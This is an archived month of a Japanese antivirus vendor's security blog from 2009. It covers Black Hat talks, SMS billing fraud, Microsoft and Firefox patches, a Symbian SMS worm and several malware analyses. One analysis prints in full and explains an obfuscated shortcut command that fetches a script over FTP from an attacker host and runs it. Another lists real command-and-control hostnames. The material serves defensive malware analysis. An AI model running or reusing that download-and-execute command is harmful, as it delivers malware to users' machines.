エフセキュアブログ

2009年07月

さらにBlack Hat USA方面の話題

  さてBlack Hat USA2009の二日目、Twitterのタイムラインを見ていたところ、 iPhoneにSMSリモート・コード実行の脆弱性 についてチャーリー・ミラーとコリン・マリナーによるプレゼンテーションが行われた後あたりから、「iPhoneのSMS機能を停止する方法」やら「iPhoneのSMSを使えなくしたから他の方法で連絡するように」といったメッセージがたくさんアップされはじめました。

  さらにF-Secureのミッコも、このような↓ポストを投げていました。
Mikko_BHUSA_7-30-09
これが面白いのは、問題のiPhoneのリモート・コード実行
SMS脆弱性を利用した攻撃テキストメッセージには「四角が含まれる」特徴があるからです。

  もっと広範囲のSMS脆弱性の問題を扱ったゼーン・ラッキーとルイス・ミラスのプレゼンテーションは立ち見が出たほどになったそうです。ここではiPhoneだけでなく、WindowsMobileやAndroidも扱われていたそうです。

  さらに、Confickerについてプレゼンテーションする予定だったミッコですが、「犯罪組織の捜査中だから」ということで、ウィルスについて新しい内容の詳細を話さないように某捜査当局から圧力があったという話題が出ています。

  そして、昨年「DNSキャッシュ・ポイズニング」の公表で大きな話題となったダン・カミンスキーは、今年はPKIの基礎構造として使われているX.509の問題を指摘しました。認証システムのバックボーンとしてPKIが普及し始めてからそろそろ12年、
PKIに対してこの間に政府や民間で多額の投資が行われて来ています。日本でも各省庁でPKIを立ち上げブリッジする相互認証システムに数億円が使われているはず。
  ところが、ごく最近になってもMD2のような古いハッシュ関数が使われていたことなどが指摘され(VeriSignを含む)、SSLの裏付けも含め改善すべき問題が山積みといえそうです。ダン・カミンスキーによれば、この問題に対処するには「DNSSECに移行するしかない」ようです。

  毎年Black Hat USAの開催後には、多数の企業がセキュリティ対策に忙しくなります。今年もセキュリティの暑い夏は続いているようです。

サービスナンバーからのリンク付きSMSメッセージが再燃

bigstockphoto_Mobile_And_Crumpled_Usd_4320077.jpg bigstockphoto.com

  我々がSMSスパムに関して記事を掲載して以来ずいぶん日が経つ。(以前の記事その後のフォローアップ

  現在、我々は金銭的な詐欺を伴う新たな事例を耳にしている。
  この詐欺は、ユーザが思わずリンクをクリックしたくなるようなテキストと共に、SMSで無害に見えるWebページへのリンクを受け取ったユーザが対象だ。

  ユーザが携帯電話のWebブラウザでこのリンクをオープンすると、その人がサービスに登録した旨を知らせるページが現れる。そのサービスでは自動的に、月額数ユーロが課される。ここに至って、我等がユーザはようやく、受け取ったSMSメッセージがスパムであると知り、何もクリックせずに携帯のWebブラウザを閉じるのだ。

  そして通常はこれで終わりとなる。このユーザは個人情報を何ら入力していないため、スパム企業は請求書を送ろうにも、彼を特定する情報を得ていないからだ。

  しかし、今回のケースでは状況が少し異なる。ユーザが自分自身に関する情報をまったく入力していなくても、高価なコンテンツ・サービスに登録されてしまい、電話料金にチャージされることになる。
  このようなことは、どのようにして起こったのだろう?

  この詐欺が上手く行く重要なポイントは、携帯電話のブラウザだ。携帯のWebブラウザは、インターネットアクセスするのに、デフォルトではWAPゲートウェイを使用するよう設定されている。WAPゲートウェイはカスタマをオンラインで識別するための方法であり、サービスに対して課金情報を提供する。従って、携帯のWebブラウザを使用して、WAP接続を介してあるページを訪問しただけで、不正直な企業が、ユーザの携帯料金に自動的に請求を加算するのに十分な情報を与えてしまうことになる。
  このプラクティスが合法か否かは、そのユーザが居住する国による。我々は法律家ではないので、この件についてこれ以上詮議することはしない。

  この手の詐欺から身を守るための、非常に簡単な方法がある。それはWAPゲートウェイを使用しない、ということだ。通常、GSMサービス・プロバイダはユーザに、WAPゲートウェイを使用しないアクセス・ポイント設定を含んだ設定情報を送ってくる。非WAPアクセス・ポイントを使用するには、携帯のWebブラウザ設定メニューで、「アクセス・ポイント」もしくは似たような内容の設定項目を探し、これを「WAPサービス」というような設定から変更すれば良い。

  Webにアクセスする際、WAPゲートウェイを使用しないことの欠点は、有料コンテンツにアクセスできないという点であり、プラスの側面はランダムなWebサイトが、ユーザを識別するのは容易ではないという点だ。

  その他、ユーザが高額な請求をブロックし、どんなサービスを使用したいかを指定する手段を、携帯電話会社が用意しているかどうかチェックするという方法もある。
  たとえば、フィンランドのほとんどのオペレーターは、ユーザがSMSトラムや地下鉄の切符のような情報サービスや公共サービスは使用したいが、サードパーティのエンタテインメント・サービスはブロックする、という風に指定できるようにしている。

宇宙とつながる携帯電話

KDDI」(au)が提案する愛のある新しいモバイルライフともいえる、「iida」に初めて触れました。
続きを読む

ベガスで「Black Hat」が開催

ラスベガスで、Black Hatブリーフィングの初日が終了しようとしている。Black Hatは最大のセキュリティ・カンファレンスの1つで、常に熟練リサーチャーたちが研究発表に招かれている。

Jeff Moss opening BlackHat 2009

  BlackLightルートキット・スキャニング・テクノロジに深く関わってきたため、私は多くのRootkitトラック・セッションに出席して過ごした。初日にはいくつか、興味深いプレゼンテーションがあった:

Stoned Bootkit, Peter Kleissner

  Peterは、Master Boot Recordを使用して、ブートプロセスの早い段階でアクティベートするルートキットを作成するための、オープンな開発フレームワークについて発表した。同テクノロジの大部分は以前のリサーチで周知のものだが、恐ろしいのはStoned Bootkitの拡張性にある。

Stoned Bootkit

  Peterは簡単に、いくつかの拡張例に触れた。一つの例は、環境保護という目的で、ACPIを使用してCPUを減速させるCO2ルートキット・プラグインだ! さて、これはまったく素晴らしいが、私の考えでは、Stoned Bootkitフレームワークの最も熱心なユーザは、同マルウェアのオーサー・コミュニティにいるだろうと思う。私の言葉を額面通り受け取って欲しいのだが、彼らがコミュニティに参加しているのは、熱帯雨林を守るためでは無いはずだ。

Ring -3 Rootkitsの紹介, Alexander Tereshkin および Rafal Wojtczuk

  ルートキットは発達し続けている。先年は、ユーザモード(Ring 3)からカーネル(Ring 0)へ、カーネルからハイパーバイザ(Ring -1)に進み、そしてついにはシステム管理モード(Ring -2)まで進んでいる。

Alexander Tereshkin presenting

  AlexanderとRafalは、Intel AMT実行環境で、悪意あるコードを実行する可能性について調査した。AMTはリモート管理のためのものだが、残念なことに、良き人々にとってはリモート管理であっても、攻撃者にとってはルートキットによるバックドアを意味している。しかし、これがルートキット・カウントダウンの終結でないことは間違いない。Ring -4 ルートキットがどこで動作するかなど、誰が推測したいと思うだろうか? とは言え、我々は間もなく知ることになるだろうと、私は確信している。

  もちろん、すべてがルートキットについてだ、という訳ではない。初日には、SSL/TLSのビルディングブロックの1つである、X.509に関する2つの興味深い講演があった。

Dan Kaminsky presenting

  その中で、Moxie MarlinspikeとDan Kaminskyがそれぞれに、ほとんどのインプリメンテーションに関わる問題を発見した。すなわち、攻撃者がすべてのWebサイトで有効であるように見える証明書を作成することを可能にする問題だ。証明書のネームフィールドに、巧みに空文字を埋め込むことにより、ブラウザが悪意ある証明書を正当なWebサイトに誤ってマッチングさせるのだ。どちらのリサーチャーも素晴らしい仕事をしている!

ラスベガスからサインオフ
Antti

PS. もし皆さんがBlack Hatに出席されているなら、木曜の午後に行われるミッコのConfickerワームに関する講演をぜひお聞き頂きたい。

Linux R&D チームのChallenge

Moi! エフセキュアで製品に関する諸々を担当しています、富安と申します。

私からは、製品に関する情報や使い方に関するTIPS、今後の取り組み等をこのブログを借りて紹介していければと思っています。

今回お届けする内容は、Linux R&D チームの取り組みについてです。

弊社ではLinux上で動作する製品として、製品をインストールしたPC自体を保護するエンドポイントセキュリティとして「エフセキュア Linux セキュリティ フル エディション」という製品を販売しています。

この製品は、弊社のWindows製品と同様に、リアルタイムでのファイルI/Oに応じたウイルス検査が可能なのですが、これを実現するためにDazukoというカーネルモジュールを利用してシステムコールの横取りを行っています。
(参考:エフセキュア Linux セキュリティ フル エディション FAQ/リアルタイム検査の動作概要について

もしリアルタイムスキャンでウイルスを検知した場合は、システムコールテーブルを書き換えてエラーを返し、ウイルスファイルにアクセスが失敗したとシステムコールの送信元プロセスに思わせるわけです。

ところが、カーネル2.6.25以降、カーネル側でシステムコールテーブルの書き換えを禁止するようになっているため、今までの方法ではリアルタイム検査ができなくなっているのです。

DebianやUbuntuの最新バージョンでは、既にカーネル2.6.25以降が採用されており、今後リリースされる他のディストリビューションの新バージョンでも採用されることになると思います。

Linux R&D チームは、現在この問題を解決する新バージョンの開発に取り組んでいます。この新バージョンでは、同時にセキュリティに関する新しいテクノロジの搭載も検討しています。期待してお待ちください。

Black Hat USA 2009にてiPhoneのSMSリモートコード実行脆弱性が公表に

  今、世界中のセキュリティ関係者はアメリカのラスベガスに続々集結して来ています。日本時間の今夜(アメリカでは29日)からスタートする世界最大規模のセキュリティコンファレンス「Black Hat USA 2009」に参加するためです。

  このBlack Hat USAコンファレンスには例年4000人近くのセキュリティ関係者が集まり、今年は29日と30日の2日間にわたって100本近いプレゼンテーションが行われます。今年は、F-Secureのミッコ・ヒッポネンも「The Conficker Mystery」と題したプレゼンテーションを行う予定になっています。

パトリック・ルノーが7月3日にポストしていた iPhoneにSMSリモート・コード実行の脆弱性 についても、30日に発見者のチャーリー・ミラーとコリン・マリナーによる解説が行われる予定です。しかし今日のForbe'sの記事によると、まだiPhoneの対策パッチはリリースされていないことが指摘されています。しかしSMSがらみの問題は、iPhoneだけの問題ではなさそうで、Windows MobileやAndroidでも同様の研究がなされています。今年のBlack Hat USAのスケジュールを見ると、やはりスマートフォン関係のプレゼンテーションは増えています。

  ラスベガスに行かなくても、これから2日間はTwitterなら @BlackHatEvents をフォローするか、あるいは #BlackHat のタグで検索すると、いろいろ面白い情報が見られるでしょう。

Microsoftから新たなOut-of-Bandパッチ

  Microsoftが2、3の脆弱性をフィックスするアウトオブバンド・パッチをリリースした。脆弱性の1つは、Internet Explorer(MS09-034, Critical)に、もう一つはVisual Studio(MS09-035, Moderate)に影響を与える。我々が以前述べたように、こういうことはめったになく、起きたとすれば正当な理由があってのことであり、注意を払ってマシンを必ずアップデートした方が良い。

  以下はこれらのセキュリティ・アップデートが脆弱性に対処する方法に関する簡単な概要だ:
  Internet Explorer, MS09-034 - このセキュリティ・アップデートは、IEがメモリでオブジェクトを処理する方法と表操作を処理する方法を修正することにより、これらの脆弱性(ユーザーが巧みに作成されたWebページをInternet Explorerを使用して閲覧した際に、リモート・コード実行を可能にする)に対処する。

  Visual Studio, MS09-035 - 同セキュリティ・アップデートは、ATLヘッダを修正することにより、脆弱性(ユーザーが脆弱なバージョンのATL、すなわちActive Template Libraryで作られたコンポーネント、あるいはコントロールをロードする際に、リモート・コード実行を可能にする)に対処するもので、これにより、これらのヘッダを使用して作られたコンポーネントやコントロールが、問題なくデータストリームからイニシャライズ可能になる。

ms09-034-crtical2 (70k image)

  頭に思い浮かぶ最後の、そして本当に大きなアウトオブバンドは、もちろん「MS08-067」で、我々は皆、これがどんな問題に導くか理解している。もしConfickerも、初日にパッチを当てたすべてのコンピュータにリーチできたとしたら、何が起きていたかを想像するのは難しい。

  「MS08-067」に関してそういう事情だったため、この新たな脆弱性はIE7およびIE8の両方を実行する、現在サポートされているすべてのバージョンのWindowsに影響を与える。例外はServer Coreインストール・オプションでインストールされたWindows Server 2008だ。

  だからぐずぐずしていないで、できるだけ早くアップデートしよう。

  エフセキュアが提供している無料のオンライン・ツール「Health Check」を使用して、皆さんのコンピュータに必要なセキュリティ・アップデートを確認することもできる。

F-Secure Health Check

  「Health Check」は現在、Internet Explorerに対応している。その他のブラウザへのサポートも、将来的に追加する予定だ。

H1N1ショートカット・マルウェア

  我々は「H1N1」新型インフルエンザをエサにした、新たなマルウェアと遭遇した。

  これはショートカット・ファイルで、.LNKに名称変更されたWindows EXE実行ファイルではなく、実際のリンクファイルだ。

  以下が、このファイルの外観だ(md5: d17e956522f83995654666c0f2343797)。

h1n1

  コマンドプロンプトからこのファイルを見ると、1987バイトの無害なショートカットに見える。

h1n1

  しかしコンテンツを見ると、何だかおかしな様子なのが分かるだろう:

h1n1

  このショートカットのプロパティを見てみよう:

h1n1

  これは「%ComSpec%」にリンクしているのだろうか? あまり良い感じはしない。このショートカットのリンク先をコピー&ペーストしてみよう:

h1n1

  よく分からない。

  では、何をしているかを見るため、これをより小さな部分に分割してみよう:

     %ComSpec% /c                         // Executes command prompt to run the next commands
     set h=p -                            // sets variable "h" as "p ?"
     set j=ge                             // Sets variable "j" as "ge"
     set s=.g03z.                         // sets variable "s" as ".g03z."
     echo echo o www%s%com^>t>b.bat       // writes "echo o www%s%com>t" to b.bat - that's "www.g03z.com"
     call b.bat                           // calls the newly created b.bat
     echo aa33>>t                         // writes "aa33" to file called t
     echo bb33>>t                         // writes "bb33" to file called t
     echo echo %j%t p p.vbs^>^>t>>c       // writes "echo %j%t p p.vbs>>t" to file called c - that's "get"
     echo echo bye^>^>t>>c                // writes "echo bye>>t" to file called c
     echo ft%h%s:t>>c                     // writes "ft%h%s:t" to file called c - that's "ftp"
     echo start p.vbs>>c                  // writes "start p.vbs" to file called c
     ren c h.bat                          // renames c to h.bat
     call h.bat                           // calls h.bat

  このショートカットをクリックすると、結果として、あなたのマシンは以下のことをすることになる:

  • 「www.g03z.com」という名称のFTPサイトに接続
  • ユーザー名「aa33」、パスワード「bb33」でログイン
  • 「p.vbs」という名称のスクリプトをダウンロード
  • スクリプトを実行


  では、「g03z.com」のオーナーは誰だろう? なるほど、ミスター「Zzzzggg」というわけだ:

h1n1

  同ドメインはまだ存在するが、ファイル「p.vbs」は現在サーバに見あたらない。よって現状では何ごとも起こらない。

  エフセキュアの製品はこの悪意あるショートカットを検出し、ブロックしている。

ヘルシンキから15分で行ける世界遺産 (フィンランド出張旅行記 その3)

先日のフィンランド出張旅行記 その2で少し触れたスオメンリンナ要塞について簡単にご紹介します。(写真多数)続きを読む

Assembly 2009

assembly

  2週間後に「Assembly 2009」デモ・パーティが開始される。エフセキュアは今回も、この重要なイベントのスポンサーを務める。

  現在、同イベントの「Invitation Intro」が発表されており、Assembly.orgからダウンロードできる。

  以下は同イントロのYoutubeビデオだ:




ホームをコールする標的型マルウェア

  標的型攻撃では、バックドアが接続するサーバの「ホスト名」を分かりにくくしようとするケースが増えている。

  標的となった多くの組織のITスタッフは、これらの攻撃を十分に認識している。彼らは疑わしいアクティビティを探すため、ログをモニタリングし続けている。

  管理者は以下に示したような、既知の悪しきロケーションに、突然接続するホストを発見するかもしれない:

mapowr.symantecs.com.tw
  • weloveusa.3322.org
  • boxy.3322.org
  • jj2190067.3322.org
  • hzone.no-ip.biz
  • tempsys.8866.org
  • zts7.8800.org
  • shenyuan.9966.org
  • xinxin20080628.gicp.net


  しかし現在では、ホスト名が変更されている。攻撃者たちは、意図的に紛らわしいドメイン名を登録しているらしく、現在、以下のような名称のホストを使用している:

  • ip2.kabsersky.com
  • mapowr.symantecs.com.tw
  • tethys1.symantecs.com.tw
  • www.adobeupdating.com
  • iran.msntv.org
  • windows.redirect.hm


  その動機は明白だ。忙しいIT管理者が、www.adobeupdating.comに接続するマシンについてファイアウォール・ログ・アラートをチェックしても、それを無視するかもしれない、と期待してのことだろう。「これはアップデートをダウンロードしようとしているPDFリーダーに違いない…」と。実際のところ、adobeupdating.comはザイールで第三者に登録されており、IPアドレスはオーストラリアを示している。

ヘルシンキの空気が奇麗なのは、、 (フィンランド出張旅行記 その2)

海外に赴いた際の楽しみのひとつといえば、滞在先で色々な乗り物に乗ること!ですよね
乗り方も違えば、仕様も違い、ルールも何もかも異なっていて、非常に面白いです。
続きを読む

新たなおとりファイル

  3週間前、標的型攻撃で使用される、おとり文書ファイルのスクリーンショットを数枚掲載した。これらは、様々な組織の特定の個人を感染させ、彼らのコンピュータへのアクセスを得るために使用されたファイルだ。

  以下に掲載した文書はすべて、バックドアをインストールするエクスプロイトを含んでいる。これらの攻撃の標的は不明。

targeted attack


targeted attack


targeted attack


targeted attack


targeted attack


targeted attack


targeted attack


targeted attack


targeted attack

  今回もざっと集めたサンプルに過ぎない。何しろ我々は、この手のファイルを数多く手に入れているので。

  これらの攻撃で使用されたホスト名の変更については、明日掲載する予定だ。

追記:英語以外の文書の翻訳に関する提案があれば、コメント欄に投稿して欲しい。

現実世界のウィルス対コンピュータ・ウィルス

Novel H1N1 Flu Situation Update  最近、以下の悪意あるファイルが電子メールで蔓延した。ファイル名は「Novel H1N1 Flu Situation Update.exe」で、アイコンからWord文書ファイルのように見える。

  同ファイルを開くと、ハード・ドライブにいくつかの新たなファイルが作成される:

  • %windir%\Temp\Novel H1N1 Flu Situation Update.doc
  • %windir%\Temp\doc.exe
  • %windir%\Temp\make.exe
  • %windir%\system32\UsrClassEx.exe
  • %windir%\system32\UsrClassEx.exe.reg


  同実行ファイルには、精巧なキーロガーなど、バックドア機能が含まれている。

  そして仕込まれた文書ファイルはマルウェアにより自動的にオープンされ、ユーザーは自分でWordファイルを開いたと考えることになる。同ドキュメントは以下のように見える。

Novel H1N1 Flu Situation Update

  我々が検出したところ、このファイル(MD5 d8a9fb16318130ccd7924e03b33070c1)はAgent.avzqだ。

マイケル・ジャクソン・マルウェアは死せず

  マイケル・ジャクソンは亡くなり、埋葬されたが、彼の名前を用いたマルウェアは横行している。

  「MichaelJackson.jpg.exe」という名称の添付ファイルで大量に送信された、この例のように。

  開くと、実行ファイルがMircベースのIRCボットを仕込み、スクリーンに以下の画像を表示する:

michael jackson

  その後、同マルウェアは「corina.ath.cx」という名のドイツにあるIRCサーバに接続し、チャンネル#branからのコマンドを受け入れ始める。

  我々が検出したところ、このファイル(MD5: 60bbc36c17edb0fb4724046655237ab8)はZapchastの亜種だ。

「Sexy View」SMSワームについてのQ&A

  「Yxe」またの名を「Sexy Space」あるいは「Sexy View」モバイルワームについて、多くの報道がなされている。そこでここでは、いくつかの質問に答えるQ&Aを掲載することにしよう:

Q:このワームが重要なのは何故?
A:これまでで初めてのテキスト・メッセージ・ワームだからだ。

Q:テキスト・メッセージ・ワームは都市伝説に過ぎないと思っていた!
A:とんでもない。

Q:テキスト・メッセージにどうやって、ワームを仕込むことができるのか?
A:できない。そのかわり、ワームがテキスト・メッセージに、ワームのWebサイトへのリンクを仕込むのだ。

Q:リンク? テキスト・メッセージ中のリンクをクリックすることができるのか?
A:その通り。事実上すべてのスマートフォンで。ちょうど、電子メール中のリンクをクリックできるようなものだ。

Q:そんなリンクをクリックするものだろうか?
A:そのリンクは、信頼できそうなメッセージ中に置かれているからだ。

Q:信頼できそうとは、どのように?
A:親友から届いたテキスト・メッセージに、「チェックして!」といったメッセージとWebリンクがあったら信頼するのではないだろうか?

Q:その手のメッセージはなりすましなのか、それとも本当に友人の電話から届くものなのか?
A:Yxeは電話帳から見つけた電話番号にメッセージを送信する。よって、もし友達が感染している場合、友人本人の電話からメッセージが届くことになる。

Q:どんなメッセージが送られてくるのか?
A:同ワームはWebサイトから新しいメッセージ・テンプレートをダウンロードするため、メッセージのタイプは様々だ。

Q:これはモバイル・ボットネットなのか?
A:そうとは言えない。同ワームの持つ唯一の遠隔コントロールは、どのようなテキスト・メッセージを送信するかを変更する、上記のアップデート・メカニズムのみだ。とは言えボットネットに近いものではある。

Q:リンクをクリックしたら、何が起こるのか?
A:皆さんの電話にSISインストールパッケージを自動的にプッシュするWebサイトへと導かれる。そしてプロンプトが現れる:「Sexy Spaceをインストールしますか?」 「はい」 or 「いいえ」

Q:セキュリティ警告は出ないのか?
A:出ない。

Q:だが、SISパッケージが承認されているので無い限り、セキュリティ警告が出てしかるべきだろう!
A:承認されているのだ。

Q:何故Symbianは承認したのか?
A:我々は、ウィルス・ライターがExpress Signing手続きを介して同マルウェアを提出したからだろうと考えている。同手続きでは、ほとんどのアプリケーションが人の手で検閲されることがないので。

Q:OK。だったら「はい」をクリックすると何が起こるのか?
A:ワームが自身を皆さんのデバイスにインストールし、電話帳に記載されているすべての連絡先に対して、同様のテキスト・メッセージを送信する。これらのメッセージは、皆さんの名前で、皆さんの電話から送られることになる。

Q: こうしたメッセージの代金を支払うのは誰?
A:皆さんだ。もし感染していれば、同ワームによって送信されるすべてのSMSの支払いをするのは皆さんなのだ。一つのテキスト・メッセージにかかる代表的なコストは5セントといったところだ。もしあなたが、500件の連絡先を電話に登録してれば、感染することで5セントの500倍支払うことになる。

Q:蔓延する以外に、そのワームは何をするのか?
A:電話からその電話のIMEIナンバーなどの情報を盗み、送信する。

Q:動機は何なのか?
A:不明だ。

Q:これらのYXEワームはどこで書かれたのか?
A:中国だ。

Q:承認を得るためにこれらYXEワームを提出した企業はどこなのか?
A: 「XiaMen Jinlonghuatian Technology Co. Ltd.」「ShenZhen ChenGuangWuXian Tech. Co. Ltd.」および「XinZhongLi TianJin Co. Ltd.」という名の企業だ。

Q:Symbianはこれらの証明書を無効にしたのか?
A:した。

Q:ということは、もう問題は無いということか?
A:そうではない。Symbianの何百万ものスマートフォンすべてに、失効証明書がただちに配布されるわけではない。失効証明書を受け取るためには、ほとんどのSymbianフォンのデフォルト設定を変更する必要があるからだ。変更するには、「Application Manager」の設定に行き、「Online certificate check」を「Must be passed」に設定すること。

  以下の画像は、その手順を示したものだ:

cert check

Q:このワームはどのくらい広まっているのか?
A:それほど広まってはいない。確認された報告は非常に少ない。Yxeは今のところ、中国および中東のみの問題のようだ。

Q:このワームに影響を受けるのはどの電話か?
A:Nokia, LGおよびSamsungのSymbian Series 60 3rd エディションすべてだ。たとえばNokia N95やNokia E71といった、ベストセラーの端末なども含まれる。

Q:どうでもいいじゃないか。どうせ誰もSymbianを使わないんだから。iPhoneがホットだからね。
A:Symbianは、スマートフォン市場の49パーセントを占めている。iPhoneは10パーセントだ。

韓国とアメリカに対するサイバー攻撃の犯人は誰だったのか

   先週発生した 米国および韓国WebサイトへのLyzapo DDoS 攻撃 について、当初は北朝鮮が攻撃発信源という報道が飛び交ったりしました。しかしよく見ると、テクノロジー系メディアが比較的に慎重な報道だったのに対し、新聞を母体とする旧来からのメディアはすぐに北朝鮮の名前を出すなど、あまりにもステレオタイプな報道なのが見えて来ます。アメリカでも旧来メディアで扱いかたは同様だったようです。

  冷静に見ると、政治的意図を理由としたサイバー攻撃は、イスラエルとアラブ諸国間やインドとパキスタン間、ロシアと旧ロシア領国間などで、以前から多く発生しています。しかし、だからといって、これらのサイバー攻撃の裏側をすぐに国家や政治的対立に結びつけるのは、単純化し過ぎと云えるのではないでしょうか。

例えば、2007年のエストニアに対するサイバー攻撃の事件では、やはり当初ロシアからの攻撃だという説が喧伝されましたが、逮捕されたのはエストニアにいる大学生でした。そして、先週の韓国とアメリカに対するサイバー攻撃も、DDoSを実行していたマルウェアはイギリスにあるサーバーからコントロールされていたという話題が出て来ています。

よく考えれば、ボットネットをコントロールしている犯罪者はボットネットを時間貸ししていたりするわけで、それならば資金さえあれば誰でも有名な国に対してサイバー攻撃を仕掛けることができるはずです。さらに、サイバー攻撃を政治的対立に結びつけるのは解り易すぎる分、じつは他の意図によるメディアの情報操作だったりする可能性も疑わしいかもしれません。

セキュリティ情報とソーシャルメディアの関係: Twitterの場合

  6月にミッコ・ヒッポネンが来日したときインタビューでは、彼はブログなど最新のソーシャルメディアの利用に積極的な面とともに、特にTwitterの利用については「半年間経過して、4,000フォローを超えなければ続けないと思います。」などと意外にコンサバな面とを見せていました。

  しかし私はそう簡単にはあきらめて欲しくないと思っています。なぜなら、Twitterのような新しいメディアは、今までに前例がなかったわけですから将来を予測することも難しいので、単純にリーチできる人数だけで計測するのでは、何か大事なポイントを外してしまうかも知れないからです。

  TwitterしているF-Secureのメンバーでは、今のところミッコのフォロワーは1630くらい、パトリック・ルノーのフォロワーは740くらい、フェイ・ウィン・チアのフォロワーは49くらいです。でも、坂本龍一さんの日本語Twitterアカウントがフォロワー452だったりしますからミッコの方が多い。他のセキュリティ関係者でも、ウェブアプリのセキュリティで知られるジェレマイア・グロスマンのフォロワーは1590くらい、DNSキャッシュポイズニング発見のダン・カミンスキーのフォロワーは2740くらい、Metasploitのhdmooreのフォロワーは3090くらいです。

  また企業名アカウントだからといって特にフォロワーが増えるわけでもありません。F-Secure Labsのフォロワーは600くらい。ではご近所業種はというと、McAfee AvertLabsでは1810くらいで、Kasperskyは1970くらいといった具合。ミッコ1人とさほど変わらないくらいのフォロワー数です。

  しかし違う視点で見てみると、アルファ・ブロガーとして知られるネタフルKogureさんのフォロワーは4650くらい、Kengoさんのフォロワーは14530くらいというように、今までのメディアでの知名度を尺度として考えてしまうと、Twitterでの人気の出方の実情が理解できなくなってしまいます。

  さらに違うのは、特に速報性という面ではTwitterは今までのニュースメディアを追い越している部分がありますから、即時性の必要なセキュリティ情報については情報発信すること自体が有益です。そして興味を持たれたポストは、「ReTweet」(RTと略す)という形でたくさんの人が複製し伝搬して行きますから、フォロワーの数というよりも、自分のポストに興味を持っている人たちがどれだけたくさんフォロワーに存在するかという方が重要なことが多いのです。

  Twitter自体の総ユーザー数も増加し続けていて、6月末には世界中で3700万人を越えたという話題が出ています。2008年の12月には500万人くらいのユーザー数だったことを考えれば、このような変化の激しいソーシャルメディアとは、情報発信する側も関わり方を研究しながら進める必要があるのではないでしょうか。

Firefox 3.5.1

  Firefox 3.5には重大な脆弱性があり、この欠陥を積極的に利用する悪意あるサイトも存在する。

  Firefox 3.5.1がリリースされ、この問題が解決された─あとでと言わず、今すぐアップデートしよう。

Firefox 3.5.1

オンライン スキャナ 4.1

  我々のオンライン スキャナがアップデートされ、一連の新たなスキャニングエンジンが追加された。

  バージョン4.1には、これらのスキャニングエンジンが含まれており、来るべき「エフセキュア インターネット セキュリティ 2010」に(皆さんがテストしているISTPにも)含まれる。

  これはIEおよびFirefoxの複数のバージョンと互換性がある。詳細はこちら、そしてスキャナはこちら

Online Scanner 4.1

バックナンバー
セキュリティ関連リンク
セキュリティ機関

政府関連

セキュリティ関連団体

研究機関・大学
詳細カテゴリ
メディア関係者の皆様へ
エフセキュアブログメンバー
エフセキュアブログメンバー
ミッコ・ヒッポネン
エフセキュア CRO(セキュリティ研究所主席研究員)(ヘルシンキ)
(Twitterアカウント)
(研究所Twitter)
ショーン・サリバン
エフセキュア セキュリティ・アドバイザー(ヘルシンキ)
(Twitterアカウント)
高間 剛典
メタ・アソシエイツ代表
(公式ブログ)
(Twitterアカウント)
星澤 裕二
株式会社セキュアブレイン 最高技術責任者
(公式ブログ)
(人物紹介)
岩井 博樹
デロイト トーマツ リスクサービス株式会社 (〜2013年3月 株式会社ラック) 情報セキュリティ大学院大学 客員研究員
(Twitterアカウント)

(人物紹介)
福森 大喜
株式会社サイバーディフェンス研究所 上級分析官
CDI-CIRTメンバー
(人物紹介)
鵜飼 裕司
株式会社FFRI 代表取締役社長
(人物紹介)
福本 佳成
楽天株式会社
執行役員
OWASP Japan
アドバイザリーボード
Rakuten-CERT representative
(人物紹介)
神田 貴雅
エフセキュア株式会社 プロダクトグループ 部長
富安 洋介
エフセキュア株式会社 プロダクトグループ
コーポレートセールスチーム
エフセキュア株式会社
(エフセキュアブログ公式Twitterアカウント)

海外記事翻訳
株式会社イメージズ・アンド・ワーズ
エフセキュアメールマガジン

ブログに載らないメルマガ限定情報や、技術者インタビュー、製品情報、技術解説を掲載して毎月一回配信します。アドレスのみの登録で購読無料。

エフセキュアブログQRコード
QRコード